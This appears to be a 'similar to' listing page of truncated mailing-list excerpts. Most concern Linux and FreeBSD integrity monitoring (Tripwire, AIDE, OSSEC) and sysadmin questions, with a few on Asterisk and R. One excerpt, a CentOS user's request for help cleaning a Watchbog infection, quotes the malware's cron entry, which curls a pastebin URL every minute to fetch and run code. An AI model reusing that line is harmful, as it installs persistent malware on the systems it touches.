similar to: Aggregating logs from numerous FreeBSD machines

I'm trying to record a Meetme conference to disk, but the Monitor application doesn't seem to play nicely with Meetme. In extensions.conf, I have this: exten => 1000,1,Answer exten => 1000,2,Monitor exten => 1000,3,Meetme This starts up the monitoring OK, and it records the prompts that Meetme gives, but as soon as the user enters the conference, the -out WAV file stops

I've read about securelevel in the mailing list archive, and found some pitfalls (and seems to me to be discarded soon). But According to me, the following configuration should offer a good security: - mount root fs read only at boot; - set securelevel to 3; - do not permit to unmount/remount roots fs read-write (now it is possible by means of "mount -uw /"); - the only way to make

Hello all, Years ago, I used to work with tripwire for system monitoring. Last time I checked with "yum search tripwire", there is no hit. IIRC, it used to be packed by default on older Redhat distros. Any suggestion for an alternative of tripwire for my CentOS 5.6? Cheers, -- ********************************************************************** Viet Nhat General Joint Stock

Another alternative is to use a FIMS/HIDS such as Aide (Advanced Intrusion Detection Environment), OSSEC or Samhain. Be prepared to learn a lot about what your OS normally does behind the scenes (and thus a fair amount of initial fine tuning to exclude those things). Aide seems to work well (I've seen only one odd result) and is quite granular. However, it is local system based rather than

Hi, I literally have about 36 machines running CentOS on a private network, and will probably change the remaining 30 or so away from Whitebox or RH in the near term. One thing I just noticed was when I tried to search out Tripwire RPM's, that none seemed evident. Can anyone point me in the direction of an Tripwire RPM that works with CentOS 4.3, or advise me on how to create one from the

In short, the reason considering (and still only considering) turning it off is to make tripwire usable again (security vs. performance, I guess). Is it possible to completely turn it off system-wide? Any additional steps needed on the existing system (that already have half of the binaries prelinked)? What order of performance degradation to expect? If it is minor, nobody is going to cry

Hi, Is there a way to find out how the CentOS 7.5 Linux box got infected with malware? Currently i am referring to http://sudhakarbellamkonda.blogspot.com/2018/11/blocking-watchbog-malwareransomware.html to carry out the below steps and is done manually. 1)rm -fr /tmp/*timesyncc.service* 2)crontab -e -u apigee delete the cron entry */1 * * * * (curl -fsSL https://pastebin.com/raw/aGTSGJJp||wget

This is one where there's probably no limit to what you could do. We have a high-security environment and are using Aide and OSSEC. Aide has been good at reporting file system changes and is very granular, the dilemma is what to monitor and what to ignore (keep from being inundated with reports of innocuous changes at the risk of missing something). However, it is not daemon-based so

I''d like to keep the desired and current states of a machine regarding it''s configuration. Sometimes a chain of administrative commands is needed to get a special thing (re)configured on a machine, e.g. reconfig of a suncluster. This cannot be done with puppet in an easy way. In the majority of cases, these commands change appropriate files, which reflect the current

I have a client project to implement PCI/DSS compliance. The PCI/DSS auditor has stipulated that the web server, application middleware (tomcat), the db server have to be on different systems. In addition the auditor has also stipulated that there be a NTP server, a "patch" server, The Host OS on all of the above nodes will be CentOS 6.2. Below is a list of things that would be

I've got an * system that is having some real problems with 1.0.2. The biggest problem is that calls going through my T100P get choppy for about 10 seconds every 1 or 2 minutes. Asterisk is running on a debian stable system with current packages. The T100P is plugged into a Adit Channelbank with 8 POTS lines hooked up to the Channelbank. I've watched the vritual memory and CPU status on

Hi all, I just recently began using HTB to try and manage bandwidth for my network. This is the script I''m using: /sbin/iptables -t mangle -A FORWARD -o eth1 -s ! 192.168.244.2 -j MARK --set-mark 53 tc qdisc add dev eth1 root handle 1: htb default 20 tc class add dev eth1 parent 1: classid 1:1 htb rate 100mbit burst 131072k quantum 59000 tc class add dev eth1 parent 1:1 classid 1:10

Is there a redhat or contrib RPM for tripwire? I looked and didn't find one, but may not have been looking in the right place. Zebee

Hello guys, Whats is the best way to identify a possible user using a botnet with php in the server? And if he is using GET commands for example in other server. Does apache logs outbound conections ? If it is using a file that is not malicious the clam av would not identify. Thanks

How do you know when a Linux system has been compromised?? Every day I watch our systems with all the typical tools, ps, top, who, I watch firewall / IPS logs, I have logwatch setup and mailing daily summaries to me and I dive deeper into logs if something looks suspicious. What am I missing or not looking at that you security gurus are looking at? I subscribe to the centos and SANS

Hi, I have a couple of aggregation operations that I don't know how to accomplish. Let me give an example. I have the following irregular time series time x 10:00:00.021 20 10:00:00.224 20 10:00:01.002 19 10:00:02:948 20 1) For each entry time, I'd like to get sum of x for the next 2 seconds

Hi, I am interested in using the cast function in R to perform some aggregation. I did once manage to get it working, but have now forgotten how I did this. So here is my dilemma. I have several thousands of probes (about 180,000) corresponding to each gene; what I'd like to do is obtain is a frequency count of the various occurrences of each probes for each gene. The data would look

Martin Pycko <martinp@digium.com> writes: > sure, use the 'n' option of the queue and put voicemail app as the next > priority Will that work? From my read of the code, the timeout parameter is only checked while the call is being sent to an agent's phone (inside the try_calling function). The timeout doesn't seem to be checked while the user is waiting to get to

All, I have been working on a component that is included with samba called SMBSH. The binary allows you to automount your NT shares by accessing your profile . I have been working on this for the last few days and have been unsuccesful at getting it work. Now I am not much of a programmer, but I did my best to try and troubleshoot this. However it just does not want to work in Linux. I

Hello, I'm not quite sure I understand how do you use HDT for dumping over tftp server. The wiki on dumping does not offer much details on how to set this up. >From my understanding is you need to run pxelinux somewhere but being that HDT is a bootable cd ISO, I don't see how I can get HDT up from a TFTP server without the need to install something on that TFTP server. Is there a more